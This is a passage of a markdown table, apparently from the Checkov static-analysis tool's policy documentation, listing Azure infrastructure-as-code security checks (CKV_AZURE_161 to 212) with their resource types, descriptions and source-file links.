CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) | +| 2046 | CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) | +| 2047 | CKV_AZURE_163 | resource | Microsoft.ContainerRegistry/registries | Enable vulnerability scanning for container images. | arm | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRContainerScanEnabled.py) | +| 2048 | CKV_AZURE_163 | resource | Microsoft.ContainerRegistry/registries | Enable vulnerability scanning for container images. | Bicep | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRContainerScanEnabled.py) | +| 2049 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. | Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) | +| 2050 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) | +| 2051 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. 
| Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) | +| 2052 | CKV_AZURE_166 | resource | Microsoft.ContainerRegistry/registries | Ensure container image quarantine, scan, and mark images verified | arm | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableImageQuarantine.py) | +| 2053 | CKV_AZURE_166 | resource | Microsoft.ContainerRegistry/registries | Ensure container image quarantine, scan, and mark images verified | Bicep | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableImageQuarantine.py) | +| 2054 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) | +| 2055 | CKV_AZURE_167 | resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) | +| 2056 | CKV_AZURE_168 | resource | Microsoft.ContainerService/managedClusters | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | arm | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py) | +| 2057 | CKV_AZURE_168 | resource | Microsoft.ContainerService/managedClusters | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. 
| Bicep | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py) | +| 2058 | CKV_AZURE_168 | resource | Microsoft.ContainerService/managedClusters/agentPools | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | arm | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py) | +| 2059 | CKV_AZURE_168 | resource | Microsoft.ContainerService/managedClusters/agentPools | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Bicep | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py) | +| 2060 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 2061 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. 
| Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 2062 | CKV_AZURE_169 | resource | Microsoft.ContainerService/managedClusters | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | arm | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py) | +| 2063 | CKV_AZURE_169 | resource | Microsoft.ContainerService/managedClusters | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Bicep | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py) | +| 2064 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) | +| 2065 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) | +| 2066 | CKV_AZURE_171 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster upgrade channel is chosen | arm | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSUpgradeChannel.py) | +| 2067 | CKV_AZURE_171 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster upgrade channel is chosen | Bicep | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSUpgradeChannel.py) | +| 2068 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | 
[AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) | +| 2069 | CKV_AZURE_172 | resource | Microsoft.ContainerService/managedClusters | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | arm | [AkSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AkSSecretStoreRotation.py) | +| 2070 | CKV_AZURE_172 | resource | Microsoft.ContainerService/managedClusters | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Bicep | [AkSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AkSSecretStoreRotation.py) | +| 2071 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) | +| 2072 | CKV_AZURE_173 | resource | Microsoft.ApiManagement/service | Ensure API management uses at least TLS 1.2 | arm | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementMinTLS12.py) | +| 2073 | CKV_AZURE_173 | resource | Microsoft.ApiManagement/service | Ensure API management uses at least TLS 1.2 | Bicep | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementMinTLS12.py) | +| 2074 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) | +| 2075 | CKV_AZURE_174 | resource | Microsoft.ApiManagement/service | Ensure API management public access is disabled | arm | 
[APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementPublicAccess.py) | +| 2076 | CKV_AZURE_174 | resource | Microsoft.ApiManagement/service | Ensure API management public access is disabled | Bicep | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementPublicAccess.py) | +| 2077 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) | +| 2078 | CKV_AZURE_175 | resource | Microsoft.SignalRService/webPubSub | Ensure Web PubSub uses a SKU with an SLA | arm | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSKUSLA.py) | +| 2079 | CKV_AZURE_175 | resource | Microsoft.SignalRService/webPubSub | Ensure Web PubSub uses a SKU with an SLA | Bicep | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSKUSLA.py) | +| 2080 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) | +| 2081 | CKV_AZURE_176 | resource | Microsoft.SignalRService/webPubSub | Ensure Web PubSub uses managed identities to access Azure resources | arm | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSpecifyIdentity.py) | +| 2082 | CKV_AZURE_176 | resource | Microsoft.SignalRService/webPubSub | Ensure Web PubSub uses managed identities to access Azure resources | Bicep | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSpecifyIdentity.py) | +| 2083 | CKV_AZURE_176 | 
resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) | +| 2084 | CKV_AZURE_177 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Windows VM enables automatic updates | arm | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py) | +| 2085 | CKV_AZURE_177 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Windows VM enables automatic updates | Bicep | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py) | +| 2086 | CKV_AZURE_177 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables automatic updates | arm | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py) | +| 2087 | CKV_AZURE_177 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables automatic updates | Bicep | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py) | +| 2088 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 2089 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 2090 | CKV_AZURE_178 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure linux VM enables SSH with keys for secure 
communication | arm | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py) | +| 2091 | CKV_AZURE_178 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure linux VM enables SSH with keys for secure communication | Bicep | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py) | +| 2092 | CKV_AZURE_178 | resource | Microsoft.Compute/virtualMachines | Ensure linux VM enables SSH with keys for secure communication | arm | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py) | +| 2093 | CKV_AZURE_178 | resource | Microsoft.Compute/virtualMachines | Ensure linux VM enables SSH with keys for secure communication | Bicep | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py) | +| 2094 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 2095 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 2096 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 2097 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | 
[VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 2098 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 2099 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 2100 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) | +| 2101 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. 
| Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) | +| 2102 | CKV_AZURE_182 | resource | Microsoft.Network/networkInterfaces | Ensure that VNET has at least 2 connected DNS Endpoints | arm | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py) | +| 2103 | CKV_AZURE_182 | resource | Microsoft.Network/networkInterfaces | Ensure that VNET has at least 2 connected DNS Endpoints | Bicep | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py) | +| 2104 | CKV_AZURE_182 | resource | Microsoft.Network/virtualNetworks | Ensure that VNET has at least 2 connected DNS Endpoints | arm | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py) | +| 2105 | CKV_AZURE_182 | resource | Microsoft.Network/virtualNetworks | Ensure that VNET has at least 2 connected DNS Endpoints | Bicep | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py) | +| 2106 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 2107 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 2108 | CKV_AZURE_183 | resource | Microsoft.Network/virtualNetworks | Ensure that VNET uses local DNS addresses | arm | 
[VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetLocalDNS.py) | +| 2109 | CKV_AZURE_183 | resource | Microsoft.Network/virtualNetworks | Ensure that VNET uses local DNS addresses | Bicep | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetLocalDNS.py) | +| 2110 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) | +| 2111 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) | +| 2112 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) | +| 2113 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. 
| Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) | +| 2114 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) | +| 2115 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) | +| 2116 | CKV_AZURE_189 | resource | Microsoft.KeyVault/vaults | Ensure that Azure Key Vault disables public network access | arm | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py) | +| 2117 | CKV_AZURE_189 | resource | Microsoft.KeyVault/vaults | Ensure that Azure Key Vault disables public network access | Bicep | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py) | +| 2118 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) | +| 2119 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) | +| 2120 | CKV_AZURE_191 | resource | Microsoft.EventGrid/topics | Ensure that Managed identity provider is enabled for Azure Event 
Grid Topic | arm | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py) | +| 2121 | CKV_AZURE_191 | resource | Microsoft.EventGrid/topics | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Bicep | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py) | +| 2122 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) | +| 2123 | CKV_AZURE_192 | resource | Microsoft.EventGrid/topics | Ensure that Azure Event Grid Topic local Authentication is disabled | arm | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py) | +| 2124 | CKV_AZURE_192 | resource | Microsoft.EventGrid/topics | Ensure that Azure Event Grid Topic local Authentication is disabled | Bicep | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py) | +| 2125 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) | +| 2126 | CKV_AZURE_193 | resource | Microsoft.EventGrid/topics | Ensure public network access is disabled for Azure Event Grid Topic | arm | 
[EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py) | +| 2127 | CKV_AZURE_193 | resource | Microsoft.EventGrid/topics | Ensure public network access is disabled for Azure Event Grid Topic | Bicep | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py) | +| 2128 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) | +| 2129 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) | +| 2130 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) | +| 2131 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) | +| 2132 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) | +| 2133 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN 
enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) | +| 2134 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) | +| 2135 | CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) | +| 2136 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) | +| 2137 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) | +| 2138 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) | +| 2139 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | 
[AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) | +| 2140 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) | +| 2141 | CKV_AZURE_206 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage Accounts use replication | arm | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsUseReplication.py) | +| 2142 | CKV_AZURE_206 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage Accounts use replication | Bicep | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsUseReplication.py) | +| 2143 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) | +| 2144 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) | +| 2145 | CKV_AZURE_208 | resource | Microsoft.Search/searchServices | Ensure that Azure Cognitive Search maintains SLA for index updates | arm | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAIndex.py) | +| 2146 | CKV_AZURE_208 | resource | Microsoft.Search/searchServices | Ensure that 
Azure Cognitive Search maintains SLA for index updates | Bicep | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAIndex.py) | +| 2147 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) | +| 2148 | CKV_AZURE_209 | resource | Microsoft.Search/searchServices | Ensure that Azure Cognitive Search maintains SLA for search index queries | arm | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py) | +| 2149 | CKV_AZURE_209 | resource | Microsoft.Search/searchServices | Ensure that Azure Cognitive Search maintains SLA for search index queries | Bicep | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py) | +| 2150 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) | +| 2151 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) | +| 2152 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) | +| 2153 | CKV_AZURE_212 | resource | 
